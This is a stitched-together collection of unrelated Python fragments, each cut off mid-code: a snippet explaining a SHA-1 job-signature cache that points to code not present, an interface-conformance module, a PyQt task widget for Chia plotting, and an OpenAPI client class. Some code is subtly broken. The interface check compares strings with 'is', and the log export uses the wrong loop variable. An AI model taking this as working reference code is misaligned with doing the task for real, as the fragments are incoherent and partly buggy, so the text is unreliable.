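The caching scheme in this module rests on compute_processor_job_output_signature: processor name/version, inputs, outputs and parameters are folded into one canonical JSON object and its SHA-1 identifies the job, so identical jobs hash to identical signatures. A self-contained sketch of that idea (the field names mirror the code above; the example values are made up):

import hashlib
import json

def job_signature(processor_name, processor_version, inputs, parameters, output_name=None):
    # Same processor + same inputs/parameters -> same hash, which is what makes result caching possible.
    signature_obj = {
        'processor': {'name': processor_name, 'version': processor_version},
        'inputs': inputs,          # e.g. {'recording': '<sha1 of the input file>'}
        'parameters': parameters,  # e.g. {'detect_threshold': 3.0}
    }
    if output_name:
        signature_obj['output_name'] = output_name
    # sort_keys=True makes the JSON canonical, so the digest is stable across runs
    return hashlib.sha1(json.dumps(signature_obj, sort_keys=True).encode('utf-8')).hexdigest()

print(job_signature('sorter', '0.1', {'recording': 'abc123'}, {'detect_threshold': 3.0}, 'firings_out'))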
<reponame>rswgnu/rsw_interface # FILE: interface.py # # SUMMARY: Inheritable class interface/protocol support for Python; implements class `Interface' and conformance functions # USAGE: from interface import *; inherit from `Interface'; call one of the conformance functions described below # KEYWORDS: interface, utility # # AUTHOR: <NAME> # LICENSE: Available under the terms of the MIT License # # DESCRIPTION: """ See the "Interface" class documentation string for details on what interfaces are and how to use them. The following are public functions defined in this module, not methods. (They are functions since many must work on objects of any type; the ones that take operands of more specific types, such as `extends' are functions so that they may be called similarly; type checks ensure that they raise exceptions if called with an invalid argument). assert_implements(aClass) call after a class definition to assert interface conformance extends(interface, *interfaces): boolean test of whether an interface extends one or more other interfaces (via inheritance); this is false if any arg is not an interface implements(obj, *interfaces) boolean test of whether a class or instance implements one or more interfaces; this is false if any of `*interfaces' is not an interface interface_names(obj) return a list of interface names which obj: implements, if `obj' is a class or instance; extends, if `obj' is an interface the list begins with `obj' itself if it is an interface interfaces(obj) return a list of interface objects which obj: implements, if `obj' is a class or instance; extends, if `obj' is an interface the list begins with `obj' itself if it is an interface is_interface(obj) boolean test of whether `obj' is an interface or class of interface ----- ancestor_names(obj, exclude_interfaces=0) return a list of ancestor class or interface names of `obj' (class, interface or instance), including `obj' itself; ancestors are returned in depth-first order, left to right; with optional `exclude_interfaces', interface ancestors are removed ancestors(obj, exclude_interfaces=0) return a list of ancestor class or interface objects of `obj' (class, interface or instance), including `obj' itself; ancestors are returned in depth-first order, left to right; with optional `exclude_interfaces', interface ancestors are removed flatten (*objs) return a single-level list of all atomic objects in `*obj' (anything other than sequences, dictionaries and Indexable types) in original order unique(*sequences) return a flattened list with duplicates removed from any number of atomic or `sequence' args; does not sort the elements """ # DESCRIP-END. ## ------------------------------------------------------------------------ ## Required modules and version levels ## ------------------------------------------------------------------------ import sys from types import * from inspect import isclass def require_python_version(min_version): """ Raises an error if Python version is less than `min_version'. Require: `min_version' is a float or string of only digits and periods Return: python version number split into a tuple Raise: SystemError if Python version is less than `min_version'. """ assert type(min_version) in (float, str) if type(min_version) is float: # Don't use `min_version` here since has a buggy float conversion in V2.0. 
min_version = "%s" % min_version # python_version_tuple would be (2, 0) for 2.0 final, for example python_version_tuple = tuple(map(int, sys.version.split()[0].split('.'))) min_version_tuple = tuple(map(int, min_version.split('.'))) if python_version_tuple >= min_version_tuple: return python_version_tuple raise SystemError("(%s): Requires Python %s or greater; running Python %s" % \ (__name__, min_version, sys.version[0].split())) require_python_version('3.0.0') ## ------------------------------------------------------------------------ ## Classes ## ------------------------------------------------------------------------ class Interface: """ A protocol to which classes may conform by implementing its method signatures, pre- and post- conditions and attributes. This is the top-level class from which all interfaces inherit. An "interface" is a class which inherits from "Interface" and provides a series of "stub methods" (which may have doc strings as well as pre- and post-condition assertions). A stub method is distinguished from other methods by naming its first argument, `iself', short for "interface self". Each stub method exists to provide a calling protocol to which any "implementor" must conform. The implementor may either overload the stub method, replacing it completely or more commonly may overload its "body method", keeping the stub method's signature, doc string and pre- and post-conditions. Body method names are computed from the interface stub method name by adding a ``_body'' to the name: stub => stub_body __stub => __stub_body __stub__ => __stub_body__ At the start of each interface definition, each stub body within the class should be equated to the "Interface.error" method so that if the stub (or the stub body) is called, an exception will be signaled: stub_body1 = stub_body2 = Interface.error An interface i2 "extends" another interface i1 iff i2 inherits from i1. A class "implements" an interface (and thus conforms to it) iff: it inherits from the interface; it or its ancestors redefine/implement all of the stub or body methods declared by the interface, keeping the number of arguments per method the same and renaming the first arg of each stub method from `iself' to `self'; and its definition is followed by a call to: assert_implements(aClass) this marks the class as a non-interface and confirms that it does in fact implement the interfaces from which it inherits. """ ## Interface attributes # The next attribute is used to test whether or not a class is an interface. # Call "assert_implements(aClass)" after class definition to disable this # flag in classes which implement the interface. interface_flag = True # Interfaces set their method stub bodies to this method so that an error is # triggered if an implementor fails to redefine the stub and mistakenly calls # the stub method. def error(self, *unused): raise InterfaceError("(%s): failed to implement the above interface stub method" % self.__name__) # Define this method in each interface to prevent instantiation of interfaces. def __init__(self, *args): """ Initializes a newly created instance. The arguments passed are those from the class constructor expression. If a base class has an __init__() method, the derived class's __init__() method must explicitly call it to ensure proper initialization of the base class part of the instance. For example, "BaseClass.__init__(self, [args ...])". 
""" raise InterfaceError('(%s): an interface may not be instantiated; if an implementor, define "__init__" to eliminate this error' \ % self.__class__) class InterfaceError(Exception): "Class of Interface-related exceptions." def __init__(self, value=None): self.value = value def __str__(self): return repr(self.value) ## ------------------------------------------------------------------------ ## Public functions ## ------------------------------------------------------------------------ def assert_implements(aClass): """ If `aClass' fails to implement any of its interfaces, print all non-conformance issues. This should be called immediately after class definitions to validate proper interface conformance. Return: True if `aClass' implements all interfaces or if assertions are disabled (__debug__ is False) Raise: TypeError if `aClass' is not a class InterfaceError if __debug__ is enabled and `aClass' fails to conform to any of its interfaces """ # Optimize away this entire function whenever assertions are ignored, i.e. when __debug__ is False # or "python -O" is used. if not __debug__: return True # Must allow for interfaces here because `aClass' is not declared # a non-interface until the end of this method. if not (isclass(aClass) or is_interface(aClass)): raise TypeError("(assert_implements): aClass arg `%s' is not a class" % aClass) # Add all ancestor interfaces to the implementation check interface_list = interfaces(aClass) errors = [] for interface in interface_list: idict = interface.__dict__ # Set istub_tuples to interface's stub methods given as (name, method) tuples. # Remove non-stub attributes and body methods. istub_tuples = [item for item in idict.items() \ if type(item[1]) is FunctionType and \ item[1].__code__.co_varnames[0] is 'iself'] # Ensure all interface stub methods are redefined by the current class # and that the number of arguments to each remains the same. for stub_name, stub_method in istub_tuples: body_name = interface_body_name(stub_name) impl_method = getattr(aClass, stub_name) try: if hasattr(aClass, body_name): body_method = getattr(aClass, body_name) body_argcount = body_method.__code__.co_argcount else: body_method = body_argcount = None body_method_unimplemented = body_method and body_method is Interface.error \ or issubclass(interface, body_method.__class__) if impl_method is stub_method and not body_method or body_method_unimplemented: # method is not implemented errors.append("(%s): failed to define %s interface method %s or %s" % \ (aClass.__name__, interface.__name__, body_name, stub_name)) impl_method_argcount = impl_method.__code__.co_argcount stub_argcount = stub_method.__code__.co_argcount if impl_method != stub_method and impl_method_argcount != stub_argcount: # impl_method
<reponame>penglecn/ChiaTools import psutil from PyQt5.QtWidgets import QWidget, QTreeWidgetItem, QHeaderView, QProgressBar, QMessageBox, QMenu, QFileDialog from PyQt5.Qt import QBrush, QColor, QModelIndex, QTimerEvent, QCursor from PyQt5.QtCore import Qt from ui.PlotWidget import Ui_PlotWidget from config import save_config, get_config from utils import size_to_str, delta_to_str, seconds_to_str, make_name from datetime import datetime, timedelta from core.plot import PlotTask, PlotSubTask from CreatePlotDialog import CreatePlotDialog from TaskOutputDialog import TaskOutputDialog import os from subprocess import run import platform from core.plot import PlotTaskManager class PlotWidget(QWidget, Ui_PlotWidget): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.setupUi(self) self.main_window = None self.treePlot.header().setSectionResizeMode(QHeaderView.ResizeToContents) self.task_manager = PlotTaskManager() self.load_tasks() self.task_manager.signalUpdateTask.connect(self.updateTaskStatus) self.task_manager.signalMakingPlot.connect(self.onMakingPlot) self.task_manager.signalNewPlot.connect(self.onNewPlot) self.task_manager.signalNewSubTask.connect(self.onNewSubTask) self.task_manager.signalSubTaskDone.connect(self.onSubTaskDone) self.outputDialogs = [] self.treePlot.doubleClicked.connect(self.showTaskOutput) self.treePlot.expanded.connect(self.onExpanded) self.treePlot.collapsed.connect(self.onCollapsed) self.treePlot.setContextMenuPolicy(Qt.CustomContextMenu) self.treePlot.customContextMenuRequested.connect(self.showTaskMenu) self.checkBoxPhase1Limit.stateChanged.connect(self.checkPhase1Limit) self.checkBoxTotalLimit.stateChanged.connect(self.checkTotalLimit) self.checkBoxNextWhenFullyComplete.stateChanged.connect(self.checkNextWhenFullyComplete) self.checkBoxAutoDeleteOldPlot.stateChanged.connect(self.checkAutoDeleteOldPlot) self.spinBoxPhase1Count.valueChanged.connect(self.changePhase1LimitCount) self.spinBoxTotalCount.valueChanged.connect(self.changeTotalLimitCount) self.checkBoxContinueWhenFail.stateChanged.connect(self.checkContinueWhenFail) self.buttonCreatePlot.clicked.connect(self.clickCreatePlot) self.buttonCreateBatchPlots.clicked.connect(self.clickCreateBatchPlots) self.timerIdUpdateTime = self.startTimer(1000) self.timerIdSaveTasks = self.startTimer(1000 * 60) config = get_config() if 'total_limit' in config: self.checkBoxTotalLimit.setChecked(config['total_limit']) if 'phase1_limit' in config: self.checkBoxPhase1Limit.setChecked(config['phase1_limit']) if 'total_limit_count' in config: self.spinBoxTotalCount.setValue(config['total_limit_count']) else: config['total_limit_count'] = 1 if 'phase1_limit_count' in config: self.spinBoxPhase1Count.setValue(config['phase1_limit_count']) else: config['phase1_limit_count'] = 1 if 'next_when_fully_complete' in config: self.checkBoxNextWhenFullyComplete.setChecked(config['next_when_fully_complete']) if 'auto_delete_old_plot' in config: self.checkBoxAutoDeleteOldPlot.setChecked(config['auto_delete_old_plot']) if 'continue_when_fail' in config: self.checkBoxContinueWhenFail.setChecked(config['continue_when_fail']) def load_tasks(self): if self.treePlot.topLevelItemCount() == 0: for task in self.task_manager.tasks: self.addTaskItem(task) def checkPhase1Limit(self, i): config = get_config() config['phase1_limit'] = self.checkBoxPhase1Limit.isChecked() save_config() def checkTotalLimit(self, i): config = get_config() config['total_limit'] = self.checkBoxTotalLimit.isChecked() save_config() def 
checkNextWhenFullyComplete(self, i): config = get_config() config['next_when_fully_complete'] = self.checkBoxNextWhenFullyComplete.isChecked() save_config() def checkAutoDeleteOldPlot(self, i): config = get_config() config['auto_delete_old_plot'] = self.checkBoxAutoDeleteOldPlot.isChecked() save_config() def checkContinueWhenFail(self, i): config = get_config() config['continue_when_fail'] = self.checkBoxContinueWhenFail.isChecked() save_config() def changePhase1LimitCount(self): config = get_config() config['phase1_limit_count'] = self.spinBoxPhase1Count.value() save_config() def changeTotalLimitCount(self): config = get_config() config['total_limit_count'] = self.spinBoxTotalCount.value() save_config() def setMainWindow(self, win): self.main_window = win def timerEvent(self, event: QTimerEvent) -> None: timer = event.timerId() if timer == self.timerIdUpdateTime: self.updateTaskTimes() elif timer == self.timerIdSaveTasks: PlotTaskManager.save_tasks() def showTaskMenu(self, pos): item: QTreeWidgetItem = self.treePlot.itemAt(pos) index = self.treePlot.indexAt(pos) if not item: return if not index: return parent_item = item.parent() if parent_item: task_item = parent_item sub_task_item = item else: task_item = item sub_task_item = None task: PlotTask = task_item.data(0, Qt.UserRole) if sub_task_item: sub_task: PlotSubTask = sub_task_item.data(0, Qt.UserRole) working = sub_task.working else: sub_task: PlotSubTask = task.current_sub_task working = task.working root_item = sub_task_item is None menu = QMenu(self) action_detail = menu.addAction(u"查看日志") action_modify = None action_delete = None action_stop = None action_suspend = None action_suspend_for_30min = None action_suspend_for_1h = None action_suspend_for_2h = None action_suspend_for_3h = None action_suspend_for_4h = None action_resume = None action_priority_realtime = None action_priority_high = None action_priority_above_normal = None action_priority_normal = None action_priority_below_normal = None action_priority_idle = None action_continue = None action_next_stop = None action_locate_temp = None action_locate_temp2 = None action_clean_temp = None action_increase_number = None action_reduce_number = None action_start_immediately = None action_clear_finished = None action_export_log = None if root_item and task.specify_count: action_detail.setDisabled(True) if task.finish: if root_item: menu.addSeparator() action_modify = menu.addAction(u"编辑") if task.specify_count: action_increase_number = menu.addAction(u"增加数量") else: action_continue = menu.addAction(u"继续") menu.addSeparator() action_delete = menu.addAction(u"删除") if not task.success: if os.path.exists(task.temporary_folder): action_clean_temp = menu.addAction(u"清除临时文件") elif working: if root_item: menu.addSeparator() action_modify = menu.addAction(u"编辑") menu.addSeparator() if task.specify_count: action_increase_number = menu.addAction(u"增加数量") if task.pending_count(): action_reduce_number = menu.addAction(u"减少数量") else: action_next_stop = menu.addAction(u"下一轮任务停止") action_next_stop.setCheckable(True) action_next_stop.setChecked(task.next_stop) if not task.specify_count and task.finished_count: menu.addSeparator() action_clear_finished = menu.addAction(u"清除已完成任务") if root_item or sub_task.working: menu.addSeparator() if task.delay_remain(): action_stop = menu.addAction(u"取消") else: action_stop = menu.addAction(u"停止") if sub_task.suspend: action_resume = menu.addAction(u"继续") else: action_suspend = menu.addAction(u"暂停") menu_suspend_for = menu.addMenu(u"暂停时间") 
action_suspend_for_30min = menu_suspend_for.addAction(u"30分钟") action_suspend_for_1h = menu_suspend_for.addAction(u"1小时") action_suspend_for_2h = menu_suspend_for.addAction(u"2小时") action_suspend_for_3h = menu_suspend_for.addAction(u"3小时") action_suspend_for_4h = menu_suspend_for.addAction(u"4小时") menu_priority = menu.addMenu(u"优先级") action_priority_realtime = menu_priority.addAction(u"实时") action_priority_high = menu_priority.addAction(u"高") action_priority_above_normal = menu_priority.addAction(u"高于普通") action_priority_normal = menu_priority.addAction(u"普通") action_priority_below_normal = menu_priority.addAction(u"低于普通") action_priority_idle = menu_priority.addAction(u"空闲") priority = sub_task.worker.priority current_priority_action = action_priority_normal if priority == psutil.REALTIME_PRIORITY_CLASS: current_priority_action = action_priority_realtime elif priority == psutil.HIGH_PRIORITY_CLASS: current_priority_action = action_priority_high elif priority == psutil.ABOVE_NORMAL_PRIORITY_CLASS: current_priority_action = action_priority_above_normal elif priority == psutil.BELOW_NORMAL_PRIORITY_CLASS: current_priority_action = action_priority_below_normal elif priority == psutil.IDLE_PRIORITY_CLASS: current_priority_action = action_priority_idle current_priority_action.setCheckable(True) current_priority_action.setChecked(True) else: if root_item: menu.addSeparator() remain = task.delay_remain() if remain: action_start_immediately = menu.addAction(u'立即开始') action_delete = menu.addAction(u"删除") if sub_task_item and sub_task.finish: menu.addSeparator() action_export_log = menu.addAction(u"导出日志") elif not sub_task_item and task.finish: menu.addSeparator() action_export_log = menu.addAction(u"导出所有日志") if os.path.exists(task.temporary_folder) and platform.system() == 'Windows': menu.addSeparator() action_locate_temp = menu.addAction(u"浏览临时文件") if task.temporary2_folder: action_locate_temp2 = menu.addAction(u"浏览第二临时文件") action = menu.exec(QCursor.pos()) if action is None: return if action == action_detail: self.showTaskOutput(index) elif action == action_export_log: if sub_task_item and sub_task.finish: log_file = '' if sub_task.plot_file: log_file = os.path.splitext(os.path.basename(sub_task.plot_file))[0] + '.log' log_file = QFileDialog.getSaveFileName(self, '导出日志', log_file, '日志文件 (*.log *.txt)')[0] if not log_file: return if not self.exportSubTaskLog(sub_task, log_file=log_file): QMessageBox.information(self, '提示', f'导出文件失败 {log_file}') return elif not sub_task_item and task.finish: folder = QFileDialog.getExistingDirectory(self, '导出所有日志') if not folder: return for _sub_task in task.sub_tasks: if _sub_task.plot_file: log_name = os.path.splitext(os.path.basename(sub_task.plot_file))[0] + '.log' else: log_name = make_name(12) + '.log' log_file = os.path.join(folder, log_name) if not self.exportSubTaskLog(_sub_task, log_file=log_file): QMessageBox.information(self, '提示', f'导出文件失败 {log_file}') return elif action == action_modify: dlg = CreatePlotDialog(task=task) if dlg.exec() == dlg.rejected: return self.task_manager.save_tasks() self.updateTaskItem(item, task) for sub in task.sub_tasks: _sub_item = self.getSubItemFromSubTask(item, sub) if _sub_item: self.updateSubTaskItem(_sub_item, sub) elif action == action_delete: all_files, total_size, temp_plot_size = task.get_temp_files() if temp_plot_size: if QMessageBox.information(self, '提示', f"检测到临时目录下存在未完成移动的plot文件(.plot.2.tmp),大小{size_to_str(temp_plot_size)},建议手动把该文件改名为.plot后移动到最终目录。\n\n确定要删除吗?", QMessageBox.Ok | QMessageBox.Cancel) == 
QMessageBox.Cancel: return if len(all_files): if QMessageBox.information(self, '提示', f"确定要删除临时目录吗?\n{len(all_files)}个文件\n{size_to_str(total_size)}GB", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if os.path.exists(task.temporary_folder) and not task.remove_temp_folder(): QMessageBox.warning(self, '提示', '清除临时目录失败!') return if sub_task and sub_task.worker: sub_task.worker.stop() self.treePlot.takeTopLevelItem(index.row()) self.task_manager.remove_task(task) elif action == action_clear_finished: for sub in task.sub_tasks[:]: if sub.finish: _sub_item = self.getSubItemFromSubTask(item, sub) if _sub_item: item.removeChild(_sub_item) task.remove_sub_task(sub) if len(task.sub_tasks) <= 1: break elif action == action_stop: if QMessageBox.information(self, '提示', "确定要停止任务吗?停止后无法恢复", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if sub_task_item: sub_task.worker.stop() else: including_copying = False for sub in task.sub_tasks: if sub.working and sub.worker and sub.worker.copying: msg = QMessageBox(QMessageBox.Information, '提示', "要将正在生成文件的任务停止吗?", QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel) msg.button(QMessageBox.Yes).setText('是') msg.button(QMessageBox.No).setText('否') answer = msg.exec() if answer == QMessageBox.Cancel: return elif answer == QMessageBox.Yes: including_copying = True break for sub in task.sub_tasks: if sub.working: if sub.worker and sub.worker.copying and not including_copying: continue sub.worker.stop() elif action == action_suspend: if sub_task_item: sub_task.worker.suspend() else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend() elif action == action_suspend_for_30min: time_for_suspend = 60*30 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_1h: time_for_suspend = 60*60*1 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_2h: time_for_suspend = 60*60*2 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_3h: time_for_suspend = 60*60*3 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_suspend_for_4h: time_for_suspend = 60*60*4 if sub_task_item: sub_task.worker.suspend(time_for_suspend) else: for sub in task.sub_tasks: if sub.working and not sub.worker.copying: sub.worker.suspend(time_for_suspend) elif action == action_resume: if sub_task_item: sub_task.worker.resume() else: for sub in task.sub_tasks: if sub.working: sub.worker.resume() elif action == action_priority_realtime: task.priority = psutil.REALTIME_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.REALTIME_PRIORITY_CLASS elif action == action_priority_high: task.priority = psutil.HIGH_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.HIGH_PRIORITY_CLASS elif action == action_priority_above_normal: task.priority = psutil.ABOVE_NORMAL_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.ABOVE_NORMAL_PRIORITY_CLASS 
elif action == action_priority_normal: task.priority = psutil.NORMAL_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.NORMAL_PRIORITY_CLASS elif action == action_priority_below_normal: task.priority = psutil.BELOW_NORMAL_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.BELOW_NORMAL_PRIORITY_CLASS elif action == action_priority_idle: task.priority = psutil.IDLE_PRIORITY_CLASS if sub_task.working and sub_task.worker: sub_task.worker.priority = psutil.IDLE_PRIORITY_CLASS elif action == action_continue: if task.finish: task.next_stop = False task.do_next(check_able_to_next=False) elif action == action_next_stop: task.next_stop = not task.next_stop elif action == action_locate_temp: folder = task.temporary_folder.replace('/', '\\') run('explorer /select, ' + folder) elif action == action_locate_temp2: folder = task.temporary2_folder.replace('/', '\\') run('explorer /select, ' + folder) elif action == action_clean_temp: all_files, total_size, temp_plot_size = task.get_temp_files() if temp_plot_size: if QMessageBox.information(self, '提示', f"检测到临时目录下存在未完成移动的plot文件(.plot.2.tmp),大小{size_to_str(temp_plot_size)},建议手动把该文件改名为.plot后移动到最终目录。\n\n确定要删除吗?", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if len(all_files) == 0: QMessageBox.information(self, '提示', '没有临时文件') return if QMessageBox.information(self, '提示', f"确定要清除临时文件吗?\n{len(all_files)}个文件\n{size_to_str(total_size)}GB", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Cancel: return if not task.delete_temp_files(): QMessageBox.warning(self, '提示', '清除临时文件失败!') elif action == action_increase_number: finished = task.finish sub_task = task.increase() self.addSubTaskItem(item, sub_task) if finished: task.do_next() return elif action == action_reduce_number: sub_task = task.sub_tasks[-1] if sub_task.finish or sub_task.working: return self.removeSubTaskItem(item, sub_task) task.reduce() elif action == action_start_immediately: if task.delay_remain(): task.delay_seconds = 0 if not sub_task_item: sub_task_item = self.getSubItemFromSubTask(item, sub_task) if sub_task_item: self.updateSubTaskItem(sub_task_item, sub_task) def exportSubTaskLog(self, sub_task: PlotSubTask, log_file): try: f = open(log_file, 'w') if not f: return for log in sub_task.log: f.write(log + '\n') f.close() return True except: return False def onExpanded(self,
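The per-task menu above uses the standard Qt custom-context-menu pattern: set Qt.CustomContextMenu on the tree, build a QMenu inside the customContextMenuRequested handler, and compare the action returned by exec() against the actions that were added. A stripped-down sketch of that pattern with illustrative widget and action names:

from PyQt5.QtCore import Qt
from PyQt5.QtGui import QCursor
from PyQt5.QtWidgets import QApplication, QMenu, QTreeWidget, QTreeWidgetItem

app = QApplication([])
tree = QTreeWidget()
tree.addTopLevelItem(QTreeWidgetItem(['demo task']))

def show_menu(pos):
    item = tree.itemAt(pos)
    if not item:
        return
    menu = QMenu(tree)
    action_log = menu.addAction('View log')
    action_stop = menu.addAction('Stop')
    chosen = menu.exec(QCursor.pos())           # blocks until the user picks an action or dismisses
    if chosen == action_log:
        print('show log for', item.text(0))
    elif chosen == action_stop:
        print('stop', item.text(0))

tree.setContextMenuPolicy(Qt.CustomContextMenu)
tree.customContextMenuRequested.connect(show_menu)
tree.show()
# app.exec() would start the event loop in a real application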
<reponame>pyansys/openapi-common import datetime import mimetypes import json import os import re import tempfile from types import ModuleType from dateutil.parser import parse from typing import Dict, Union, List, Tuple, Type, Optional, Any, Callable from urllib.parse import quote import requests from requests.structures import CaseInsensitiveDict from ._util import ( SessionConfiguration, handle_response, ) from ._base import ( PrimitiveType, DeserializedType, SerializedType, ModelBase, ApiClientBase, ) from ._exceptions import ApiException # noinspection DuplicatedCode class ApiClient(ApiClientBase): """Provides a generic API client for OpenAPI client library builds. This client handles client-server communication and is invariant across implementations. Specifics of the methods and models for each application are generated from OpenAPI templates and are responsible for interfacing with the public API exposed by the client. Parameters ---------- session : requests.Session Base session object that the API client is to use. api_url : str Base URL for the API. All generated endpoint URLs are relative to this address. configuration : SessionConfiguration Configuration options for the API client. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... <ApiClient url: http://my-api.com/API/v1.svc> For testing purposes, it is common to configure an API with a self-signed certificate. By default, the :class:`ApiClient` class will not trust self-signed SSL certificates. To allow this, pass a path to the root certificate to the :class:`SessionConfiguration` object. For more configuration examples, see :class:`SessionConfiguration`. >>> session_config = SessionConfiguration(cert_store_path='./self-signed-cert.pem') ... ssl_client = ApiClient(requests.Session(), ... 'https://secure-api/API/v1.svc', ... session_config) ... ssl_client <ApiClient url: https://secure-api/API/v1.svc> """ PRIMITIVE_TYPES = (float, bool, bytes, str, int) NATIVE_TYPES_MAPPING = { "int": int, "bytes": bytes, "float": float, "str": str, "bool": bool, "date": datetime.date, "datetime": datetime.datetime, } def __init__( self, session: requests.Session, api_url: str, configuration: SessionConfiguration, ): self.models: Dict[str, Type[ModelBase]] = {} self.api_url = api_url self.rest_client = session self.configuration = configuration def __repr__(self) -> str: return f"<ApiClient url: {self.api_url}>" def setup_client(self, models: ModuleType) -> None: """Set up the client for use and register models for serialization and deserialization. This step must be completed prior to using the :class:`ApiClient` class. Parameters ---------- models : ModuleType Module containing models generated by the Swagger code generator tool. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... import ApiModels as model_module ... 
client.setup_client(model_module) """ self.models = models.__dict__ def __call_api( self, resource_path: str, method: str, path_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, query_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, header_params: Union[Dict[str, Union[str, int]], None] = None, body: Optional[Any] = None, post_params: Optional[Any] = None, files: Optional[Any] = None, response_type: Optional[str] = None, _return_http_data_only: Optional[bool] = None, collection_formats: Optional[Dict[str, str]] = None, _preload_content: bool = True, _request_timeout: Optional[Union[float, Tuple[float]]] = None, ) -> Union[requests.Response, DeserializedType, None]: # header parameters header_params = header_params or {} if header_params: header_params_sanitized = self.sanitize_for_serialization(header_params) header_params = dict( self.parameters_to_tuples(header_params_sanitized, collection_formats) ) # path parameters if path_params: resource_path = self.__handle_path_params( resource_path, path_params, collection_formats ) # query parameters query_params_str = "" if query_params: query_params_str = self.__handle_query_params( query_params, collection_formats ) # post parameters if post_params or files: post_params = self.prepare_post_parameters(post_params, files) post_params = self.sanitize_for_serialization(post_params) post_params = self.parameters_to_tuples(post_params, collection_formats) # body if body: body = self.sanitize_for_serialization(body) if isinstance(body, (list, dict)): body = json.dumps(body).encode("utf8") # request url url = self.api_url + resource_path # perform request and return response response_data = self.request( method, url, query_params=query_params_str, headers=header_params, post_params=post_params, body=body, _preload_content=_preload_content, _request_timeout=_request_timeout, ) self.last_response = response_data return_data: Union[requests.Response, DeserializedType, None] = response_data if _preload_content: # deserialize response data if response_type: return_data = self.deserialize(response_data, response_type) else: return_data = None if _return_http_data_only: return return_data else: return return_data, response_data.status_code, response_data.headers def __handle_path_params( self, resource_path: str, path_params: Union[Dict[str, Union[str, int]], List[Tuple], None], collection_formats: Optional[Dict[str, str]], ) -> str: path_params_sanitized = self.sanitize_for_serialization(path_params) path_params_tuples = self.parameters_to_tuples( path_params_sanitized, collection_formats ) for k, v in path_params_tuples: # specified safe chars, encode everything resource_path = resource_path.replace( f"{{{k}}}", quote(str(v), safe=self.configuration.safe_chars_for_path_param), ) return resource_path def __handle_query_params( self, query_params: Union[Dict[str, Union[str, int]], List[Tuple], None], collection_formats: Optional[Dict[str, str]], ) -> str: query_params_sanitized = self.sanitize_for_serialization(query_params) query_params_tuples = self.parameters_to_tuples( query_params_sanitized, collection_formats ) return "&".join(["=".join(param) for param in query_params_tuples]) def sanitize_for_serialization(self, obj: Any) -> Any: """Build a JSON POST object. Based on the object type, this method returns the sanitized JSON representation to send to the server: * If obj is ``None``, return ``None``. * If obj is ``str``, ``int``, ``float`` or ``bool``, return directly. 
* If obj is :class:`datetime.datetime` or :class:`datetime.date`, convert to string in ``iso8601`` format. * If obj is ``list``, sanitize each element in the ``list``. * If obj is ``tuple``, sanitize each element in the ``tuple``. * If obj is ``dict``, return the ``dict``. * If obj is an OpenAPI model, return the ``properties`` ``dict``. Parameters ---------- obj : DeserializedType Data to sanitize and serialize. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... client.sanitize_for_serialization({'key': 'value'}) {'key': 'value'} >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... client.sanitize_for_serialization(datetime.datetime(2015, 10, 21, 10, 5, 10)) '2015-10-21T10:05:10' """ if obj is None: return None elif isinstance(obj, self.PRIMITIVE_TYPES): return obj elif isinstance(obj, list): return [self.sanitize_for_serialization(sub_obj) for sub_obj in obj] elif isinstance(obj, tuple): return tuple(self.sanitize_for_serialization(sub_obj) for sub_obj in obj) elif isinstance(obj, (datetime.datetime, datetime.date)): return obj.isoformat() if isinstance(obj, dict): obj_dict = obj else: obj_dict = { obj.attribute_map[attr]: getattr(obj, attr) for attr in obj.swagger_types if getattr(obj, attr) is not None } return { key: self.sanitize_for_serialization(val) for key, val in obj_dict.items() } def deserialize( self, response: requests.Response, response_type: str ) -> DeserializedType: """Deserialize the response into an object. Based on the type of response, the appropriate object is created for use. For responses that are in JSON format, this method processes the response and returns it: * If ``response_type`` is ``file``, save the content to a temporary file and return the file name. * If ``response_type`` is :class:`datetime.datetime` or :class:`datetime.date`, parse the string and return the ``datetime`` object. * If ``response_type`` is ``list``, recursively deserialize the list contents. * If ``response_type`` is ``dict``, recursively deserialize the dictionary keys and values. * If ``response_type`` is the name of an OpenAPI model, return the model object. Parameters ---------- response : requests.Response Response object received from the API. response_type : str String name of the class represented. Examples -------- >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... api_response = requests.Response() ... api_response._content = b"{'key': 'value'}" ... client.deserialize(api_response, 'Dict[str, str]]') {'key': 'value'} >>> client = ApiClient(requests.Session(), ... 'http://my-api.com/API/v1.svc', ... SessionConfiguration()) ... api_response = requests.Response() ... api_response._content = b"'2015-10-21T10:05:10'" ... client.deserialize(api_response, 'datetime.datetime') datetime.datetime(2015, 10, 21, 10, 5, 10) """ if response_type == "file": return 